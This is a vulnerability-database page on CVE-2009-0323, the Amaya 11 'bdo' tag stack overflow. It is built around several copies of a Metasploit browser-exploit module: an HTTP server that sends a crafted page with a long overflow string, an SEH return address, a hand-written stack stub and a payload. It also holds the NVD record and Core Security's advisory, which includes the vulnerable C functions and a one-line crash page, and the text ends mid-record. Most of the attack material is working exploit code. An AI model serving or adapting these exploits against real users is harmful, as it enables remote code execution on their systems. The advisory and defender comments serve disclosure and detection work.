ID MSF:EXPLOIT/WINDOWS/BROWSER/AMAYA_BDO Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the "bdo" tag, an attacker may be able to execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# Metasploit browser-exploit module for CVE-2009-0323, a stack-based buffer
# overflow in the Amaya 11 web browser/editor. The module stands up an HTTP
# server (HttpServer::HTML mixin) and answers every request with one page that
# carries an over-long attribute value inside a <bdo> tag.
#
# Defender notes, grounded in this file and the advisory text on this page:
# - The vendor fix shipped in Amaya 11.1; 11.0 and earlier are affected.
# - The served page is easy to recognise on the wire: a `<bdo dir="` attribute
#   several kilobytes long that ends in the literal `">pwned!</bdo>`.
# - Every answered request is logged with "Sending <module name>".
class MetasploitModule < Msf::Exploit::Remote
  # Reliability ranking declared by the module authors.
  Rank = NormalRanking

  # Provides the HTTP server and send_response_html used below.
  include Msf::Exploit::Remote::HttpServer::HTML
  # SEH helper mixin; the handler-record bytes below are nonetheless laid out by hand.
  include Msf::Exploit::Remote::Seh

  # Registers module metadata: references, payload constraints and the single target.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => "Amaya Browser v11.0 'bdo' Tag Overflow",
      # NOTE: the %q body below is a runtime string; its line layout is kept verbatim.
      'Description' => %q{
This module exploits a stack buffer overflow in the Amaya v11 Browser.
By sending an overly long string to the "bdo"
tag, an attacker may be able to execute arbitrary code.
},
      'License' => MSF_LICENSE,
      'Author' => [ 'dookie, original exploit by Rob Carter' ],
      'References' =>
        [
          [ 'CVE', '2009-0323' ],
          [ 'OSVDB', '55721' ],
          [ 'BID', '33046' ],
          [ 'BID', '33047' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 970,               # must agree with the NOP padding in on_request_uri
          'BadChars' => "\x00",         # NUL excluded; presumably it would truncate the attribute string — confirm
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # 'Offset' is declared here but on_request_uri repeats the value 6889 as a literal;
          # 'Ret' is an address inside wxmsw28u_core_vc_custom.dll (per the original author).
          [ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
        ],
      'DisclosureDate' => 'Jan 28 2009',
      'DefaultTarget' => 0))
  end

  # Builds the crafted page and sends it to every client that requests the
  # served URI; the request itself is not inspected.
  #
  # Buffer layout, in concatenation order:
  #   "<bdo dir=\"" + 6889 random alpha bytes
  #   + 4 bytes + [target.ret] (presumably the nSEH / SEH-handler pair — confirm against the Seh mixin)
  #   + a 13-byte push/pop/sub/push/ret stub (see inline comments)
  #   + 100 NOPs + payload.encoded + NOP padding to 970 bytes
  #   + "\">pwned!</bdo>"
  #
  # @param cli the connected client socket
  # @param request the incoming HTTP request (unused)
  # @return [nil] when the payload cannot be regenerated; otherwise the result of handler(cli)
  def on_request_uri(cli, request)
    # Re-generate the payload
    # NOTE(review): `p` is assigned but never read; the guard only tests for nil.
    return if ((p = regenerate_payload(cli)) == nil)

    # Set the exploit buffer
    sploit = "<bdo dir=\""
    sploit += rand_text_alpha(6889)          # same length as target 'Offset'
    sploit += "\x74\x06\x41\x41"
    sploit += [target.ret].pack('V')         # 32-bit little-endian
    sploit += "\x68\x7f\x01\x01\x7f" # push 7F01017F
    sploit += "\x58" # pop EAX
    # NOTE(review): the five bytes decode to SUB EAX, 0x7D456918, not 7A7A0857 as the
    # original comment states — worth confirming against a disassembler.
    sploit += "\x2d\x18\x69\x45\x7d" # sub EAX, 7A7A0857
    sploit += "\x50" # push EAX
    sploit += "\xc3" # RETN
    sploit += make_nops(100)
    sploit += payload.encoded
    # Pads to the declared 'Space' of 970; relies on the framework enforcing that
    # limit, since a longer payload would yield a negative NOP count.
    sploit += make_nops(970 - payload.encoded.length)
    sploit += "\">pwned!</bdo>"

    # Logged for every request answered; useful when auditing module activity.
    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, sploit)

    # Handle the payload
    handler(cli)
  end
end
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/AMAYA_BDO", "type": "metasploit", "bulletinFamily": "exploit", "title": "Amaya Browser v11.0 'bdo' Tag Overflow", "description": "This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the \"bdo\" tag, an attacker may be able to execute arbitrary code.\n", "published": "2009-10-10T21:51:25", "modified": "2017-07-24T13:26:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0323"], "cvelist": ["CVE-2009-0323"], "lastseen": "2020-08-14T20:34:05", "viewCount": 46, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2020-08-14T20:34:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0323"]}, {"type": "exploitdb", "idList": ["EDB-ID:7902", "EDB-ID:16548"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83102"]}, {"type": "freebsd", "idList": ["A89B76A7-F6BD-11DD-94D9-0030843D3802"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_A89B76A7F6BD11DD94D90030843D3802.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063357", "OPENVAS:63357"]}], "modified": "2020-08-14T20:34:05", "rev": 2}, "vulnersScore": 8.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/amaya_bdo.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Amaya Browser v11.0 'bdo' Tag Overflow\",\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Amaya v11 Browser.\n By sending an overly long string to the \"bdo\"\n tag, an 
attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'dookie, original exploit by Rob Carter' ],\n 'References' =>\n [\n [ 'CVE', '2009-0323' ],\n [ 'OSVDB', '55721' ],\n [ 'BID', '33046' ],\n [ 'BID', '33047' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 970,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll\n ],\n 'DisclosureDate' => 'Jan 28 2009',\n 'DefaultTarget' => 0))\n end\n\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Set the exploit buffer\n sploit = \"<bdo dir=\\\"\"\n sploit += rand_text_alpha(6889)\n sploit += \"\\x74\\x06\\x41\\x41\"\n sploit += [target.ret].pack('V')\n sploit += \"\\x68\\x7f\\x01\\x01\\x7f\" # push 7F01017F\n sploit += \"\\x58\"\t\t # pop EAX\n sploit += \"\\x2d\\x18\\x69\\x45\\x7d\" # sub EAX, 7A7A0857\n sploit += \"\\x50\"\t\t # push EAX\n sploit += \"\\xc3\"\t\t # RETN\n sploit += make_nops(100)\n sploit += payload.encoded\n sploit += make_nops(970 - payload.encoded.length)\n sploit += \"\\\">pwned!</bdo>\"\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, sploit)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T05:39:58", "description": "Multiple stack-based buffer overflows in W3C Amaya Web Browser 10.0 and 11.0 allow remote attackers to execute arbitrary code via (1) a long type parameter in an input tag, which is not properly handled by the EndOfXmlAttributeValue function; (2) an \"HTML GI\" in a start tag, which is not properly handled by the ProcessStartGI function; and unspecified vectors in (3) html2thot.c and (4) xml2thot.c, related to the msgBuffer variable. NOTE: these are different vectors than CVE-2008-6005.", "edition": 6, "cvss3": {}, "published": "2009-01-28T20:30:00", "title": "CVE-2009-0323", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0323"], "modified": "2018-10-11T21:01:00", "cpe": ["cpe:/a:w3:amaya:8.1", "cpe:/a:w3:amaya:1.3b", "cpe:/a:w3:amaya:8.5", "cpe:/a:w3:amaya:2.3", "cpe:/a:w3:amaya:8.8.3", "cpe:/a:w3:amaya:1.2", "cpe:/a:w3:amaya:8.8.5", "cpe:/a:w3:amaya:1.1", "cpe:/a:w3:amaya:1.1c", "cpe:/a:w3:amaya:6.4", "cpe:/a:w3:amaya:2.2", "cpe:/a:w3:amaya:9.1", "cpe:/a:w3:amaya:2.4", "cpe:/a:w3:amaya:4.3.2", "cpe:/a:w3:amaya:8.4", "cpe:/a:w3:amaya:8.1a", "cpe:/a:w3:amaya:8.8.1", "cpe:/a:w3:amaya:1.0a", "cpe:/a:w3:amaya:9.2.1", "cpe:/a:w3:amaya:3.2", "cpe:/a:w3:amaya:1.4a", "cpe:/a:w3:amaya:8.7.1", "cpe:/a:w3:amaya:11.0", "cpe:/a:w3:amaya:9.52", "cpe:/a:w3:amaya:3.0", "cpe:/a:w3:amaya:10.0", "cpe:/a:w3:amaya:8.52", "cpe:/a:w3:amaya:8.1b", "cpe:/a:w3:amaya:6.0", "cpe:/a:w3:amaya:4.3", "cpe:/a:w3:amaya:6.2", 
"cpe:/a:w3:amaya:8.7", "cpe:/a:w3:amaya:6.3", "cpe:/a:w3:amaya:9.0", "cpe:/a:w3:amaya:9.53", "cpe:/a:w3:amaya:8.0", "cpe:/a:w3:amaya:5.2", "cpe:/a:w3:amaya:4.0", "cpe:/a:w3:amaya:8.7.2", "cpe:/a:w3:amaya:7.1", "cpe:/a:w3:amaya:8.3", "cpe:/a:w3:amaya:4.3.1", "cpe:/a:w3:amaya:1.3a", "cpe:/a:w3:amaya:7.0", "cpe:/a:w3:amaya:9.4", "cpe:/a:w3:amaya:4.2", "cpe:/a:w3:amaya:9.5", "cpe:/a:w3:amaya:5.0", "cpe:/a:w3:amaya:7.2", "cpe:/a:w3:amaya:4.2.1", "cpe:/a:w3:amaya:1.0", "cpe:/a:w3:amaya:9.3", "cpe:/a:w3:amaya:5.1", "cpe:/a:w3:amaya:3.2.1", "cpe:/a:w3:amaya:9.54", "cpe:/a:w3:amaya:8.8.4", "cpe:/a:w3:amaya:1.4", "cpe:/a:w3:amaya:3.1", "cpe:/a:w3:amaya:8.6", "cpe:/a:w3:amaya:0.95b", "cpe:/a:w3:amaya:1.3", "cpe:/a:w3:amaya:2.1", "cpe:/a:w3:amaya:9.55", "cpe:/a:w3:amaya:1.2a", "cpe:/a:w3:amaya:0.9", "cpe:/a:w3:amaya:6.1", "cpe:/a:w3:amaya:8.2", "cpe:/a:w3:amaya:5.3", "cpe:/a:w3:amaya:4.1", "cpe:/a:w3:amaya:2.0", "cpe:/a:w3:amaya:1.1a"], "id": "CVE-2009-0323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0323", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:w3:amaya:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.0a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.5:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.54:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.55:*:*:*:*:*:*:*", 
"cpe:2.3:a:w3:amaya:9.53:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.3a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.1c:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.7:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.1b:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:0.95b:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.2a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.1a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.4a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.1a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.3b:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:w3:amaya:8.2:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:49", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Amaya Browser v11.0 bdo tag overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0323"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83102", "href": "https://packetstormsecurity.com/files/83102/Amaya-Browser-v11.0-bdo-tag-overflow.html", "sourceData": "`## \n# $Id: amaya_bdo.rb \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Amaya Browser v11.0 bdo tag overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the Amaya v11 Browser. \nBy sending an overly long string to the \"bdo\" \ntag, an attacker may be able to execute arbitrary code. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'dookie, original exploit by Rob Carter' ], \n'Version' => '$Revision: 6812 $', \n'References' => \n[ \n[ 'CVE', '2009-0323' ], \n[ 'OSVDB', '55721' ], \n[ 'BID', '33046, 33047' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 970, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll \n], \n'DisclosureDate' => 'Jan 28 2009', \n'DefaultTarget' => 0)) \nend \n \n \ndef on_request_uri(cli, request) \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Set the exploit buffer \nsploit = \"<bdo dir=\\\"\" \nsploit += \"\\x41\" * 6889 \nsploit += \"\\x74\\x06\\x41\\x41\" \nsploit += [target.ret].pack('V') \nsploit += \"\\x68\\x7f\\x01\\x01\\x7f\" # push 7F01017F \nsploit += \"\\x58\" # pop EAX \nsploit += \"\\x2d\\x18\\x69\\x45\\x7d\" # sub EAX, 7A7A0857 \nsploit += \"\\x50\" # push EAX \nsploit += \"\\xc3\" # RETN \nsploit += make_nops(100) \nsploit += payload.encoded \nsploit += make_nops(970 - payload.encoded.length) \nsploit += \"\\\">pwned!</bdo>\" \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, sploit) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83102/amaya_bdo.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T04:18:38", "description": "Amaya Web Editor XML and HTML parser Vulnerabilities. CVE-2009-0323. 
Dos exploit for windows platform", "published": "2009-01-28T00:00:00", "type": "exploitdb", "title": "Amaya Web Editor XML and HTML parser Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0323"], "modified": "2009-01-28T00:00:00", "id": "EDB-ID:7902", "href": "https://www.exploit-db.com/exploits/7902/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nAmaya web editor XML and HTML parser vulnerabilities\n\n\n\n1. *Advisory Information*\n\nTitle: Amaya web editor XML and HTML parser vulnerabilities\nAdvisory ID: CORE-2008-1211\nAdvisory URL: http://www.coresecurity.com/content/amaya-buffer-overflows\nDate published: 2009-01-28\nDate of last update: 2009-01-26\nVendors contacted: INRIA\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 33046, 33047\nCVE Name: N/A\n\n\n3. *Vulnerability Description*\n\nAmaya is the W3C's Web editor/browser, a tool used to create and update\ndocuments directly on the Web. Multiple stack buffer overflow\nvulnerabilities have been discovered in Amaya, which can be exploited by\nunauthorized people using crafted web pages to compromise a user's system.\n\n\n4. *Vulnerable packages*\n\n . Amaya 11.0 and previous versions.\n\n\n5. *Non-vulnerable packages*\n\n . Amaya 11.1.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nPatched versions should be downloadable from Amaya's web site [1].\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Dan Crowley and\nAlfredo Ortega from Core Security Technologies.\n\n\n8. 
*Technical Description / Proof of Concept Code*\n\nMultiple stack buffer overflow vulnerabilities have been discovered in\nAmaya web editor/browser [1], which can be exploited by unauthorized\npeople using crafted web pages to compromise a user's system.\n\nA boundary error when processing 'input' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long 'type' parameter\n(Bugtraq ID 33046). Code analysis of the Amaya XHTML parser reveals\nmultiple unchecked buffers declared on the stack, one of which is used\nin the function 'EndOfXmlAttributeValue()':\n\n/-----------\n\nXml2thot.c\n\n3247\tstatic void EndOfXmlAttributeValue (char *attrValue)\n3248\n3249\t{\n3250\t AttributeType attrType;\n3251\t int attrKind, val;\n3252\t unsigned char msgBuffer[MaxMsgLength];\n3253\n\n.\n.\n.\n3265\t if (val <= 0)\n3266\t {\n3267\t sprintf ((char *)msgBuffer,\n3268\t \"Unknown attribute value \\\"%s\\\"\", (char\n*)attrValue);\n3269\t XmlParseError (errorParsing, (unsigned char *)msgBuffer,\n0);\n3270 }\n\n\n- -----------/\n\n\n\nWe can see here that the 'sprintf' function at line 3267 will write on\nthe buffer 'msgBuffer' if there is an error, but it will never check\nthat the error message fits the length of that buffer, so if the\nattribute exceeds a length of about 170 characters, a buffer overflow\nwill ensue.\n\nThe following page consisting of a single HTML tag is enough to trigger\nthis vulnerability. 
This code will control the instruction pointer,\ncausing the Amaya web editor program to jump to the address '0x41414141':\n\n/-----------\n\n<input\ntype=\"aBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBAAAA\">\n\n- -----------/\n\n\n\nOther stack-based buffer overflows were discovered.\n\nWhen reading the HTML in function 'EndOfStartGI()', the length of the\nvariable 'theGI' is correctly limited to the buffer length.\n\n/-----------\n\nhtml2toth.c:\n\n2506\n/*----------------------------------------------------------------------\n2507\t EndOfStartGI An HTML GI has been read in a start tag.\n2508\n- ----------------------------------------------------------------------*/\n2509\tstatic void EndOfStartGI (char c)\n2510\t{\n2511\t char theGI[MaxMsgLength];\n.\n.\n.\n2538\t strncpy ((char *)theGI, (char *)inputBuffer, MaxMsgLength - 1);\n2539\t theGI[MaxMsgLength - 1] = EOS\n.\n.\n.\n2596\t ProcessStartGI (theGI);\n\n- -----------/\n\n But when calling 'ProcessStartGI()', an error message will add 50 extra\ncharacters to this variable (line 2440), and a stack-based buffer\noverflow will ensue (Bugtraq ID 33047):\n\n/-----------\n\n2321\n/*----------------------------------------------------------------------\n2322\t ProcessStartGI An HTML GI has been read in a start tag.\n2323\t Create the corresponding Thot thing (element, attribute,\n2324\t or character), according to the mapping table.\n2325\n- ----------------------------------------------------------------------*/\n2326\tstatic void ProcessStartGI (const char* GIname)\n2327\t{\n2331\t char msgBuffer[MaxMsgLength];\n\n.\n.\n.\n\n2436\t if (error)\n2437\t /* element not allowed in the current structural context */\n2438\t {\n2439\t /* send an error message */\n2440\t sprintf (msgBuffer,\n2441\t \"Tag <%s> is not allowed here (removed when\nsaving)\",\n2442\t GIname);\n2443\t HTMLParseError 
(HTMLcontext.doc, msgBuffer, 0);\n\n\n- -----------/\n\n This is not an exhaustive enumeration of the stack-based buffer\noverflows that can be found in Amaya. Remarkably, in the unpatched\nversion, files 'html2thot.c' and 'xml2thot.c' contain many general\npurpose buffers defined as\n\n/-----------\n\nchar msgBuffer[MaxMsgLength]\n- -----------/\n\n and the length of buffers is generally not checked in the functions\nusing them (i.e. 'strcpy', 'sprintf', etcetera).\n\n\n9. *Report Timeline*\n\n. 2008-12-18: Core notifies the vendor of the vulnerability.\n. 2008-12-19: Vendor requests information about versions tested.\n. 2008-12-19: Core notifies the vendor that the vulnerability was tested\non Amaya 11.0 and 10.0 (Windows XP).\n. 2008-12-29: Core offers to send the advisory draft to the vendor and\noffers to negotiate the publication date.\n. 2009-01-08: Core sends the advisory draft to the vendor.\n. 2009-01-09: Vendor informs that the bugs were fixed in the CVS version\nand will be included in version 11.1 by the end of January.\n. 2009-01-12: Core requests a more precise date.\n. 2009-01-14: Vendor suggest to publish the advisory on January 28th at\nthe same time of release of Amaya 11.1.\n. 2009-01-14: Core confirms the vendor that advisory CORE-2008-1211 will\nbe published on January 28th.\n. 2009-01-28: Core publishes advisory CORE-2008-1211.\n\n\n10. *References*\n\n[1] Amaya Homepage http://www.w3.org/Amaya\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. 
We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFJgKLpyNibggitWa0RAmNOAKCT1Mxhe8VysinqBnwAtbuuhAaedgCeOWL6\nDWuJPZIBvcK5lINLAJ2ylR8=\n=X9Dw\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-01-28]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7902/"}, {"lastseen": "2016-02-02T00:06:50", "description": "Amaya Browser v11.0 bdo tag overflow. CVE-2009-0323. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Amaya Browser 11.0 - bdo tag Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0323"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16548", "href": "https://www.exploit-db.com/exploits/16548/", "sourceData": "##\r\n# $Id: amaya_bdo.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
